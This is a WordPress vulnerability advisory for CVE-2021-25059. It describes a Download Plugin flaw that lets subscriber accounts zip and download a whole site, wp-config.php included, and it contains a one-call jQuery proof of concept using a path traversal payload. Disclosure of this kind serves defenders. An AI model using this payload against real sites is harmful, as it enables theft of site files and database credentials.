Download Plugin < 2.0.0 – Subscriber+ Website Download | CVE 2021-25059 | Plugin Vulnerabilities

Description

The plugins does not properly validate a user has the required privileges to access a backup's nonce identifier, which may allow any users with an account on the site (such as subscriber) to download a full copy of the website.

Proof of Concept

PoC:
jQuery.post(ajaxurl,{
action:"dpwap_plugin_download_url",
pluginData:"..\\..\\..\\wordpress"
})

Warning: this will make a zip of the whole installation and takes a few minutes.

The result is available at https://example.com/wordpress.zip and the zip file contains all files under the installation directory including wp-config.php.

Affects Plugins

download-plugin

Fixed in 2.0.0

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

b125a765-a6b6-421b-bd8a-effec12bc629

Timeline

Publicly Published

2021-11-11 (about 2 years ago)

Added

2022-11-02 (about 1 years ago)

Last Updated

2022-11-02 (about 1 years ago)

Other

Published

Title

Published

2019-07-23

Title

WPS Child Themes Generator <= 1.1 - Path Traversal

Published

2019-02-14

Title

WP Cost Estimation < 9.660 - Upload Directory Traversal

Published

2022-08-09

Title

WPide < 3.0 - Admin+ Arbitrary File Read

Published

2023-05-15

Title

Snow Monkey Forms < 5.0.7 - Unauthenticated Path Traversal

Published

2023-05-15

Title

MW WP Form < 4.4.3 - Unauthenticated Path Traversal